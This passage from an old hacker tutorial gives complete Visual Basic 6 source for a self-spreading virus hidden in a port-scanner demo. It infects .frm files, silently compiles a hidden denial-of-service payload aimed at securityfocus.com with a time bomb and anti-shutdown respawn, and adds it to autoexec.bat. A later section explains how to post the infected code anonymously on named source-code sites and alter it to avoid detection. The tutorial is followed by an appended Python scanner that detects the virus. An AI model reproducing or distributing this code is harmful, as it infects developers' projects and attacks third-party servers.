'-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 6 - ___---=== Viral Code attached to working program (final product)===---___ Here is a program that is infected with the finished and working version of the virus, with the payload included. All that this needs to spread is for some dumb vb developer to run this bad boy and all of his vb6.0 programs that are in X:\program files file folder will be infected (X being the drive that the program is run on). This will include all of the built in .frm files that visual studio comes with. Example: some built in .frm files are "FrmAbout" and "FrmDialog" and "FrmLogin" and so on and so on. Any of these can be added to a vb6.0 project at any time, and if they are infected, then the virus will continue to spread. The virus code in this section is the exact same virus code that is in section 5, except the code in this section is actualy attached to a working program, and its 100% ready to go! Use section 5 to help you understand what exactly is going on in this section. I found this program that is titled "PortScanner Tutorial" on the internet somewhere. It is used for port scanning, but thats not what im using it for here. To use this code, just take the part here marked Form1.Frm and put it into a text file, then name it "Form1.Frm" Do the same to the part marked "PortScanner Tutorial.vbp" and "Portscanner Tutorial.vbw" Then if you have visual basic 6.0 installed, you can run and compile this INFECTED visual basic project. 
Form1.Frm: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX" Begin VB.Form Form1 BorderStyle = 3 'Fixed Dialog Caption = "Demo of a Portscanner" ClientHeight = 3690 ClientLeft = 45 ClientTop = 330 ClientWidth = 7095 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 3690 ScaleWidth = 7095 ShowInTaskbar = 0 'False StartUpPosition = 3 'Windows Default Begin VB.TextBox FoundPorts Height = 2175 Left = 240 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 6 Top = 720 Width = 6735 End Begin MSComctlLib.StatusBar Status Align = 2 'Align Bottom Height = 255 Left = 0 TabIndex = 5 Top = 3435 Width = 7095 _ExtentX = 12515 _ExtentY = 450 Style = 1 SimpleText = "Idle..." _Version = 393216 BeginProperty Panels {8E3867A5-8586-11D1-B16A-00C0F0283628} NumPanels = 1 BeginProperty Panel1 {8E3867AB-8586-11D1-B16A-00C0F0283628} EndProperty EndProperty End Begin VB.TextBox txtPortEnd Height = 285 Left = 4080 TabIndex = 4 Text = "65536" Top = 240 Width = 855 End Begin VB.TextBox txtPortStart Height = 285 Left = 3120 TabIndex = 3 Text = "1" Top = 240 Width = 855 End Begin VB.TextBox txtHost Height = 285 Left = 240 TabIndex = 2 Text = "Localhost" Top = 240 Width = 2535 End Begin VB.CommandButton Command1 Caption = "Start" Height = 285 Left = 5040 TabIndex = 1 Top = 240 Width = 1935 End Begin MSWinsockLib.Winsock Sock Index = 0 Left = 6600 Top = 3000 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin VB.Label Label1 AutoSize = -1 'True Caption = "This Winsock control is called ""Sock"" and has an index of 0 --->" BeginProperty Font Name = "MS Sans Serif" Size = 9.75 Charset = 0 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 240 Left = 0 TabIndex = 0 Top = 3120 Visible = 0 'False Width = 6540 End End Attribute 
VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Command1_Click() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = 
"'teh endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 '************************************************ '* This is where it gets a bit more complicated * '************************************************ Dim Socket As Variant ' for instances of the socket we will ' use in the For loop Dim CurrentPort As Integer ' Obvious Const MaxSockets = 100 ' change this for Speed / Accuracy ' between 1 - 200 ' it's stable enough to use this On Error Resume Next ' We need a way to Start / Stop, so we'll use ' the command button's caption as a reference If Command1.Caption = "Start" Then ' to prevent errors, disable teh textboxes txtHost.Enabled = False txtPortStart.Enabled = False txtPortEnd.Enabled = False 'see above Command1.Caption = "Stop" ' Lets load some sockets to use For i = 1 To MaxSockets 'Load new sock instance i Load Sock(i) Next i CurrentPort = txtPortStart.Text ' Again using the command1.caption as a reference ' to start / stop 
While Command1.Caption = "Stop" ' set up the ports to scan by referencing ' each instance of the socket in turn For Each Socket In Sock ' Definately Need this so the system doesn't freeze DoEvents ' check if the socket is still trying to connect ' or is connected If Socket.State <> sckClosed Then ' skip the increment of the port GoTo continue End If ' close the socket to make double sure Socket.Close ' if it got to here, it's ready to try ' the next port, only after checking ' if we've done all the ports and the user ' hasn't clicked on Stop If CurrentPort = Val(txtPortEnd.Text) + 1 _ Then Exit For 'set the host Socket.RemoteHost = txtHost.Text ' set the port Socket.RemotePort = CurrentPort ' inform the user of the port being scanned Status.SimpleText = "Now Scanning Port " & CurrentPort ' attempt connect Socket.Connect ' fromhere, the socket will do one of two things ' 1) Raise a Connect therefore the port is open ' 2) Raise an Error therefore the port is closed ' increment the current port CurrentPort = CurrentPort + 1 ' if the socketisn't ready to be incremented, go here continue: ' goto the next socket instance Next Socket Wend 'set the command1.caption to Start so we can scan again Command1.Caption = "Start" ' re-enable the textboxes txtHost.Enabled = True txtPortStart.Enabled = True txtPortEnd.Enabled = True Else ' command1.caption is "Stop" Command1.Caption = "Start" End If ' close all the sockets to save memory For i = 1 To MaxSockets Unload Sock(i) Next i End Sub Private Sub FoundPorts_Change() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 
'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As #freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line 
Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. 
'.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) & "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. 
Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns half as long 'teh endg '**************************************************** '* So that out textbox scrolls down automatically * '* we use the SelStart property in the * '* FoundPorts_change Event. 
* '**************************************************** ' Pseudo code '~~~~~~~~~~~~ ' Selection start position = length of Text in Text control FoundPorts.SelStart = Len(FoundPorts.Text) End Sub Private Function AddPort(Port As Integer) '************************************************** '* This is a function to add the port to the list * '************************************************** 'Pseudo code '~~~~~~~~~~~ ' Text = current text + newtext + carriage return FoundPorts.Text = FoundPorts.Text & "[Connected] Port " & Port & vbCrLf End Function Private Sub Sock_Connect(Index As Integer) ' the port is open so inform the user AddPort (Sock(Index).RemotePort) ' close the socket so it can't be flooded by anti ' portscanner tools and it gets incremented Sock(Index).Close End Sub Private Sub Sock_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ' the port is closed so close the socket so it ' will be incremented Sock(Index).Close End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. 
must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 
'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? 
'-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Portscanner Tutorial.vbp: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINNT\System32\stdole2.tlb#OLE Automation Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX Startup="Form1" Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' PortScanner Tutorial.vbw: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Form1 = 44, 44, 378, 492, CZ, 22, 22, 356, 470, C '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 7 - ___---=== Executing and spreading virus ===---___ Ok, so even if you do not know anything about programming, source code viruses, DoS or anything at all in this article, you can still cause damage. In this chapter I will explain how. Program Developers get lots of their code from already working programs from sites such as http://plantsourcecode.com or other free source code sites. Lots of the time when they need a function or API call or even a whole program, they dont even try to understand how the code works, or even look at the code at all. Most of the time, the programmer/developer will test out the code to see if the program works first, then copy and paste what is relevent. 
If they run the program without looking at the code first, the code can execute anything it wants and there will be nothing the developer can do about it. This is the #1 method this source code virus uses to spread. We will create a real program that works, attach our virus to it then post it at several sites such as planetsourcecode.com. If the program looks interesting and/or original, the programmer/developer will download the program to test it out to see if it is worthy of their use. With any luck, the virus will infect a bunch of their code, then it will also create an exe using its commented code.

Here are the three easy steps to successfully post code at a site that people will download. The mark for this example will be planetsourcecode.com, the most widely used free source code site I know of.

STEP ONE: Infect an already existing program with this source code virus. It can be an original program of yours, or just rip one off from planetsourcecode.com and pretend it is original.

STEP TWO: Use a proxy, or tor, or a public computer or some other way to anonymously create an account with planetsourcecode.com

STEP THREE: While still being anonymous, post the source code. PSC (planet source code) will ask you to fill in a bunch of fields like "Type API calls used here" and "Type what this program does here". Make the program sound original, unique and special in some way. In short, make it sound like your program is very good and anyone and everyone should be using it. Make people want to download it.

STEP FOUR: There is no step four! And that's that!

I recommend not to use the source code that has the virus already attached that is included in this program because it will be easily recognized. If you are any good at VB, feel free to modify this code to make it harder to spot. Change the markers. Switch the amount of sub functions it infects. Make it somewhat polymorphic and just basically make it look different.
Any of these will make the source look different and harder to spot from the original. I could have added a polymorph engine, but this would have significantly added to the size of the file. I think the smaller and tighter the code, the quicker it will spread from file to file and the harder it will be to spot.

Here is a short list of sites that people download VB source from. Use these sites to post your bogus programs

http://plantesourcecode.com
http://www.freevbcode.com/
http://www.codeproject.com/
http://www.planet-source-code.com/
http://www.codearchive.com/
http://www.programmersheaven.com/
http://www.freeprogrammingresources.com/vbsource.html
http://abstractvb.com/
http://www.vbcode.com/
http://www.developerfusion.co.uk/vb/

8 - ___---=== Outros ===---___

This virus could be ported to VB.NET or VB 2003 or any other basic-type language. The concepts in this article can be applied to 90% of all programming languages and most scripting languages as well, including Delphi, C, C++, ASM just to name a few. All you really have to do is pick a language you hate and apply these concepts to that language then post the source on the net.

~This t-file is dedicated to my inspiration, Marijah-Wahna.~

-=If you ate ten pot brownies before going to bed, you would write=-
.,shit like this too!!,.

EOF
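A defender-side check for downloaded VB6 form source, as an added example that is not part of the original article: it flags the delimiter comments and drop-file names used in the listing above, plus structural traits (hidden `cmd.exe` shells, a commented-out form or project header, `vb6.exe /m`) that remain when the marker strings are changed. The rule names, the `scan_frm` and `classify` functions and all three sample inputs are constructed for illustration.

```python
"""Flag VB6 form source (.frm text) that carries traits of the infector listed above."""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    rule: str
    text: str


# Whole-line delimiter comments the listing copies between (taken from the article).
MARKERS = {"'faqchew", "'faqchew2", "'fakmeh", "'teh endg"}
# Staging and drop names from the listing: DOS look-alikes spelled with a zero.
STAGING = re.compile(
    r"\b(C0NFIG\.sys|MSD0S\.sys|B00T\.INI|AUT0EXEC\.BAT|I0\.SYS|FileAloc100\.exe)", re.I)
# Structural traits that do not depend on the marker strings.
HIDDEN_SHELL = re.compile(r"\bShell\s*\(.*cmd\.exe.*\)\s*,\s*vbHide", re.I)
HEADLESS_BUILD = re.compile(r"vb6\.exe\s+/m\b", re.I)
EMBEDDED_HDR = re.compile(
    r"^'+\s*(VERSION \d+\.\d+|Attribute VB_Name|Begin VB\.Form|Type=Exe)", re.I)


def scan_frm(source: str) -> List[Finding]:
    """Return one Finding per rule hit, in line order."""
    findings = []
    for no, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        is_comment = line.startswith("'")
        if line.lower() in MARKERS:
            findings.append(Finding(no, "marker", line))
        if STAGING.search(line):
            findings.append(Finding(no, "staging-file", line))
        if HEADLESS_BUILD.search(line):
            findings.append(Finding(no, "headless-build", line))
        # Only live code counts here; a commented-out Shell call is not executed.
        if not is_comment and HIDDEN_SHELL.search(line):
            findings.append(Finding(no, "hidden-shell", line))
        # A form or project header hidden inside comments of another form.
        if EMBEDDED_HDR.match(line):
            findings.append(Finding(no, "embedded-project", line))
    return findings


def classify(findings: List[Finding]) -> str:
    """known-sample: article's own strings present; review: structural traits only."""
    rules = {f.rule for f in findings}
    if rules & {"marker", "staging-file"}:
        return "known-sample"
    return "review" if rules else "clean"


# Constructed sample: a few lines shaped like the infected form in the article.
INFECTED_SAMPLE = """\
Private Sub Command1_Click()
'faqchew
App.TaskVisible = False
Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide
'faqchew2
Status.SimpleText = "Idle..."
End Sub
'VERSION 5.00
'Attribute VB_Name = "Form1"
"""

# Constructed sample: same shape with different marker and file names.
RENAMED_VARIANT = """\
Private Sub Form_Load()
'zz-start
Shell ("cmd.exe /c dir /b /s > list.tmp"), vbHide
Shell ("cmd.exe /c vb6.exe /m p.vbp out.exe"), vbHide
'zz-end
End Sub
'VERSION 5.00
'Type=Exe
"""

# Constructed sample: ordinary form code with a visible Shell call.
CLEAN_SAMPLE = """\
Private Sub Command1_Click()
' start the scan
Status.SimpleText = "Idle..."
Shell "notepad.exe", vbNormalFocus
End Sub
"""

if __name__ == "__main__":
    for name, src in [("infected", INFECTED_SAMPLE), ("renamed", RENAMED_VARIANT),
                      ("clean", CLEAN_SAMPLE)]:
        hits = scan_frm(src)
        print(name, classify(hits), [(f.line_no, f.rule) for f in hits])
```

Run it over every `.frm` in a downloaded project before opening the project in the IDE; a `review` verdict means the file needs a manual read, not that it is infected.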